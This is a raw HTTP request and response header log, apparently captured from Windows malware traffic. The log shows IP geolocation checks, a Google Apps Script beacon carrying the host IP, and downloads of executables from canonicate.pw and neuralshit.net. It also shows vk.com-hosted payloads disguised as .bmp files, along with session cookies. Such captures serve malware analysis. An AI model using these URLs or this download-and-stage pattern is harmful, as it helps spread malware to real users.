HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ldX2PyU%2FeGKFJiMWmYW8QcCw5Ejp3ih3L5EWAqX5gPXBE1Q%2BrJjZcSkVAzAdtaq9nINQwV0keNOIb7LIve%2B7rBwRI2C%2BqfNSyYLKNdQe%2BCKeO3cEEac1yov9F8Ohcg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 811d17d5cfc919d5-KIX

GET /demo/home.php?s=175.208.134.152 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:48 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive x-iplb-request-id: 8D655660:A7BA_93878F2E:0050_651FDC38_1458A2:0401 x-iplb-instance: 30783 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8EDfyIHGNTEpcsVSSJKbE1Ya9sMM57QgSLFkOK7thAPp%2Fe2e3jsngeQCX6%2FNxs3%2FazCGWTt8ZBlSSUH8tksYYLU5ymXGo5IPFiM9gO07fG60ToBNB3r5H%2B6NIw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 811d18016b891a11-KIX alt-svc: h3=":443"; ma=86400

GET /demo/home.php?s=175.208.134.152 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:48 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive x-iplb-request-id: AC46E96D:9FAC_93878F2E:0050_651FDC38_1437B7:BDCA x-iplb-instance: 30782 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W6i1RfxHIhzGM%2BVswWC68TN7MiF9jK6KeMa5%2BwumLCBFaPPBMlH9MFLO%2B4wgK1Vq8azuYsXFFhA9dv1e5A%2BSm95FLH8c7DLrmAPh1%2FrGzmCvptpVecmfjVBcuA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 811d18016821833e-KIX alt-svc: h3=":443"; ma=86400

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: yandex.ru

HTTP/1.1 302 Moved temporarily Accept-CH: Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA, Sec-CH-UA-Full-Version-List, Sec-CH-UA-WoW64, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Platform, Sec-CH-UA-Full-Version, Viewport-Width, DPR, Device-Memory, RTT, Downlink, ECT Cache-Control: max-age=1209600,private Date: Fri, 06 Oct 2023 10:06:49 GMT Location: https://dzen.ru/?yredirect=true NEL: {"report_to": "network-errors", "max_age": 100, "success_fraction": 0.001, "failure_fraction": 0.1} P3P: policyref="/w3c/p3p.xml", CP="NON DSP ADM DEV PSD IVDo OUR IND STP PHY PRE NAV UNI" Portal: Home Report-To: { "group": "network-errors", "max_age": 100, "endpoints": [{"url": "https://dr.yandex.net/nel", "priority": 1}, {"url": "https://dr2.yandex.net/nel", "priority": 2}]} Transfer-Encoding: chunked X-Content-Type-Options: nosniff X-Robots-Tag: unavailable_after: 12 Sep 2022 00:00:00 PST X-Yandex-Req-Id: 1696586809441740-4409912244596221621-balancer-l7leveler-kubr-yp-vla-24-BAL-1327 set-cookie: is_gdpr=0; Path=/; Domain=.yandex.ru; Expires=Sun, 05 Oct 2025 10:06:49 GMT set-cookie: is_gdpr_b=CJbqDxC90gEoAg==; Path=/; Domain=.yandex.ru; Expires=Sun, 05 Oct 2025 10:06:49 GMT set-cookie: _yasc=eDiInDN9/6iIeLLU+izYdvVsNNQI1QMAc2Yzf6AOjvKMP2sXReY2zAj1AEPM4MAB5mAh; domain=.yandex.ru; path=/; expires=Mon, 03 Oct 2033 10:06:49 GMT; secure set-cookie: i=E62lJKWpOBGwcwAhATeuVmQmq2w9qtz6SOLTsrlBQ1bX9MgKTXmczhBCKQP7PMUuXaGWUvBMPUMlvfQ5V48leRcyPUU=; Expires=Sun, 05-Oct-2025 10:06:49 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly set-cookie: yandexuid=9962216211696586809; Expires=Sun, 05-Oct-2025 10:06:49 GMT; Domain=.yandex.ru; Path=/; Secure set-cookie: yashr=1810170861696586809; Path=/; Domain=.yandex.ru; Expires=Sat, 05 Oct 2024 10:06:49 GMT; Secure; HttpOnly

GET /?yredirect=true HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: dzen.ru

HTTP/1.1 302 Found Content-Length: 0 Content-Type: application/json;charset=utf-8 Date: Fri, 06 Oct 2023 10:06:51 GMT Location: https://sso.passport.yandex.ru/push?uuid=ae03ef72-00d8-4bf0-95e7-2adf274c6da2&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue Set-Cookie: zen_sso_checked=1; Path=/; Domain=.dzen.ru; Expires=Fri, 06-Oct-2023 22:06:51 GMT; Max-Age=43200; Secure; HttpOnly Set-Cookie: _yasc=QExGEDXbly0LThHkfL3kOz0pqaukOVZLGv3lyjDKKXhKlgnpLwDiANkNVdrGuABvZg==; domain=.dzen.ru; path=/; expires=Mon, 03 Oct 2033 10:06:51 GMT; secure

GET /macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=2&ip=175.208.134.152&slots=1000&param=empty HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Host: script.google.com

HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Access-Control-Allow-Origin: * Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 06 Oct 2023 10:06:54 GMT Location: https://script.googleusercontent.com/macros/echo?user_content_key=L8KUs1rDf-0IxQaOsq4CEpa7DDTmpmXtfNxjubxYqEQM4p4Z4FWvLgPEWYS54LjtIqEZBEGVtnrPKA7Hm9CoK7E1dT35ZNduOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa_kSw3KJAyZKK3RTU5bpIFQ10ckTyHVSt1vTS5MZ6zqvS4V0cmy1dEEXVXg5zXDjcYCeAylu8DyVhn7i0fteRV_StcynBwb4deQK9NYe9nyjGugVZE-wIMyy0t00odE9g2WAxU2P290mztxgOvWCrwUlG84sMvwcnjz6TyhbZb4SC3Ow0v_3PNk&lib=MAg_X_j8YJSR0PZgL-LNb21v93CYKtC0D X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked

GET /push?uuid=ae03ef72-00d8-4bf0-95e7-2adf274c6da2&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sso.passport.yandex.ru Cookie: yashr=1810170861696586809; yandexuid=9962216211696586809; i=E62lJKWpOBGwcwAhATeuVmQmq2w9qtz6SOLTsrlBQ1bX9MgKTXmczhBCKQP7PMUuXaGWUvBMPUMlvfQ5V48leRcyPUU=; _yasc=eDiInDN9/6iIeLLU+izYdvVsNNQI1QMAc2Yzf6AOjvKMP2sXReY2zAj1AEPM4MAB5mAh; is_gdpr_b=CJbqDxC90gEoAg==; is_gdpr=0

HTTP/1.1 200 OK Server: nginx Date: Fri, 06 Oct 2023 10:06:53 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1959 Connection: close Vary: Accept-Encoding X-Download-Options: noopen X-Content-Type-Options: nosniff Surrogate-Control: no-store Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate Pragma: no-cache Expires: 0 X-DNS-Prefetch-Control: off X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src 'none'; frame-ancestors https://*.dzen.ru https://dzen.ru; connect-src 'self'; script-src 'nonce-61ddcf9d8a46a009fa50acf7e6a0b557' 'self'; img-src 'self' Set-Cookie: mda2_beacon=1696586813411; Domain=.passport.yandex.ru; Expires=Tue, 19 Jan 2038 03:14:07 GMT; Secure; Path=/ Set-Cookie: ys=c_chck.4032421641; Domain=.yandex.ru; Secure; Path=/ Set-Cookie: mda2_domains=dzen.ru; Domain=.passport.yandex.ru; Expires=Tue, 19 Jan 2038 03:14:07 GMT; Secure; Path=/ Referrer-Policy: origin ETag: W/"7a7-ooX0YDVM+irK1PCz248IyMbqylU" Strict-Transport-Security: max-age=315360000; includeSubDomains

GET /macros/echo?user_content_key=L8KUs1rDf-0IxQaOsq4CEpa7DDTmpmXtfNxjubxYqEQM4p4Z4FWvLgPEWYS54LjtIqEZBEGVtnrPKA7Hm9CoK7E1dT35ZNduOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa_kSw3KJAyZKK3RTU5bpIFQ10ckTyHVSt1vTS5MZ6zqvS4V0cmy1dEEXVXg5zXDjcYCeAylu8DyVhn7i0fteRV_StcynBwb4deQK9NYe9nyjGugVZE-wIMyy0t00odE9g2WAxU2P290mztxgOvWCrwUlG84sMvwcnjz6TyhbZb4SC3Ow0v_3PNk&lib=MAg_X_j8YJSR0PZgL-LNb21v93CYKtC0D HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Host: script.googleusercontent.com

HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Access-Control-Allow-Origin: * Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 06 Oct 2023 10:06:54 GMT X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding Transfer-Encoding: chunked

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cache-control: max-age=28800 x-iplb-request-id: AC46E919:27FE_93878F2E:0050_651FCF77_13F3D0:0401 x-iplb-instance: 30783 CF-Cache-Status: HIT Age: 3272 Last-Modified: Fri, 06 Oct 2023 09:12:23 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HW1WPFUzwPNXHHV5x%2BKSok8UFhWSaZgCDvYfnEEHuCYiLhCPDL3RgN3Kgy39reQptNIaefPgMJ6Gn3KT90Wx8U8WgF9YB866rRQz8mNbp0aIpDhSUmASDEJ7UA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 811d182a5fd717c3-KIX alt-svc: h3=":443"; ma=86400

POST /v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self HTTP/1.1 Connection: Keep-Alive Referer: https://db-ip.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 0 Host: api.db-ip.com

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:06:55 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive access-control-allow-origin: http*://*db-ip.com cache-control: max-age=180 x-iplb-request-id: AC46E96E:EE1A_93878F2E:0050_651FDC3F_1402C6:0402 x-iplb-instance: 30783 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Jq2fjo3w%2F2sfTHt%2BYmRylBqz3z6HHP5l5N%2BJFW%2BfBZ%2FfxSjHWRQCjdZN50DbQHsa0%2BApN8bKW57jsrix2lQUAX8uoDUHYKDCBwsPELbEJjjNQbv45lSQH6XrYinm%2Bhk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 811d182bbfcb8cfb-KIX alt-svc: h3=":443"; ma=86400

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9068392460242250140_fh3NZX5gDFHD8Hj7N8Zyk126zEn245klE7eRXCjs7UT; remixlgck=4cc197c429e7515b9e; remixstid=1001451352_fA3CI2FBtekudNhOKON77inFnS9gwuLjj9KypUFIyAw

HTTP/1.1 200 OK Server: kittenx Date: Fri, 06 Oct 2023 10:06:56 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 316736 Connection: keep-alive X-Powered-By: KPHP/7.4.114745 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605108 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:07:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ngNXO%2F30hIYkQ84N5CoyIWJu3pxNwfV%2FSw40WCx18bRGa9pTH8QHROCzTOQ31DwDXjARHuOXNTSXnwdZC0Ln872ZEHuwRPxtQwc6C54aL83FwHTMOdFMq1ZvvqHNqQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 811d187c5f498382-KIX

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9068392460242250140_fh3NZX5gDFHD8Hj7N8Zyk126zEn245klE7eRXCjs7UT; remixlgck=4cc197c429e7515b9e; remixstid=1001451352_fA3CI2FBtekudNhOKON77inFnS9gwuLjj9KypUFIyAw

HTTP/1.1 200 OK Server: kittenx Date: Fri, 06 Oct 2023 10:07:15 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 316736 Connection: keep-alive X-Powered-By: KPHP/7.4.114745 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front623306 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /setup294.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: canonicate.pw Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:07:20 GMT Content-Type: application/x-msdos-program Content-Length: 1644448 Connection: keep-alive Last-Modified: Fri, 06 Oct 2023 09:50:38 GMT ETag: "1917a0-607092c347780" Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=im0k30xoeIrUI19LKSx3QF7nfm3YG3eGJiWOxr%2FY1rH2a%2Fe40vsrrfI2EuhS4OZlhYdHwvv4OZsDSCcvMHd%2F4WcoFUbjVKn36g9rJxTT1viQVPpE%2BwFAsETcaSqHSCsa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 811d18c31a87f62d-NRT alt-svc: h3=":443"; ma=86400

GET /de23c80b17fd061a388b791d44b53133/7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Connection: Keep-Alive Cache-Control: no-cache Host: neuralshit.net

HTTP/1.1 200 OK Date: Fri, 06 Oct 2023 10:07:21 GMT Content-Type: application/x-ms-dos-executable Content-Length: 4436344 Connection: keep-alive Last-Modified: Fri, 06 Oct 2023 10:02:41 GMT Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pAJqeLsjNZZH4c7zD4MgOVFSi0euFp9WlpH4l1tjnTTzlNatqylJRHs2L91xjR%2F6X3FQNOnxU%2B8THwzlrUasFbZkxNCBF2WFsnSPMNKAYFcqE9fNINnXbj65vibwyhooRg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 811d18ca3ba8830b-KIX alt-svc: h3=":443"; ma=86400

GET /profiles/76561199557479327 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0 Host: steamcommunity.com

HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 06 Oct 2023 10:07:21 GMT Content-Length: 33427 Connection: keep-alive Set-Cookie: sessionid=e849b26b7a9ea23036b38faf; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=KR%7Cf412d3b2c2b6515b2cdce927ad7acf7b; Path=/; Secure; HttpOnly; SameSite=None

GET /doc52355237_666294895?hash=MrFrxQ1QY2cQxZMJSWB2ifsnzfn6OL4Lra0UjlNVtcg&dl=KQd3ouCijKMpS3N5SuzYWBo56zMPCFtaA3gtOmd22rc&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9068392460242250140_fh3NZX5gDFHD8Hj7N8Zyk126zEn245klE7eRXCjs7UT; remixlgck=4cc197c429e7515b9e; remixstid=1001451352_fA3CI2FBtekudNhOKON77inFnS9gwuLjj9KypUFIyAw

HTTP/1.1 200 OK Server: kittenx Date: Fri, 06 Oct 2023 10:07:24 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 316668 Connection: keep-alive X-Powered-By: KPHP/7.4.114745 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front623306 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc52355237_666326545?hash=syS3a4VzeA6ooPqV2bDmzdZcRY1zZZVZSwKomUizgpH&dl=9YVv5GINa4fsl9tfR95IZk8DoZOa4nbjbaLRAcxuMog&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9068392460242250140_fh3NZX5gDFHD8Hj7N8Zyk126zEn245klE7eRXCjs7UT; remixlgck=4cc197c429e7515b9e; remixstid=1001451352_fA3CI2FBtekudNhOKON77inFnS9gwuLjj9KypUFIyAw

HTTP/1.1 302 Found Server: kittenx Date: Fri, 06 Oct 2023 10:07:26 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114745 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c235031/u52355237/docs/d13/0aeb7c514923/PL_Client.bmp?extra=zEYLOhDaQqXBo8LHo45R7nwioXoRej0oNRyEVJGCrqajrvSvMw0tliZUIWtDiJ7aOfgdBozitFTgy__8OMIvxe4kKI1wRLO-Ex-HxkH2YWqrhTpszc1R-VBrI5-Kmqhg_zVTt6CoGc2U5-Af X-Frontend: front623306 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc52355237_666590785?hash=N9XtNiMroCgPfI0zEbYcHPGlKJBrPpbgER5008wKXgo&dl=iXMzcCAwAL4mYrLUL1WiJZkinj4A8dUzVBRZ9BP5y50&api=1&no_preview=1#redcl HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9068392460242250140_fh3NZX5gDFHD8Hj7N8Zyk126zEn245klE7eRXCjs7UT; remixlgck=4cc197c429e7515b9e; remixstid=1001451352_fA3CI2FBtekudNhOKON77inFnS9gwuLjj9KypUFIyAw

HTTP/1.1 302 Found Server: kittenx Date: Fri, 06 Oct 2023 10:07:27 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114745 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-21.userapi.com/c237231/u52355237/docs/d22/84c17767b8f5/2.bmp?extra=7GGUqehS9cUw4D_UVlnB-WQh96d-uDWVI9rWh5wEXCeBm0fdDYnLC_zieZY4sPcEWwLMlYJVF6StZc55T2RYsn9F-Ukgh9zqn8ob0nvmE6-oS-hUZ8a-1KX2SINgfeEiVIsNlQPFV_oevlI3 X-Frontend: front623306 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

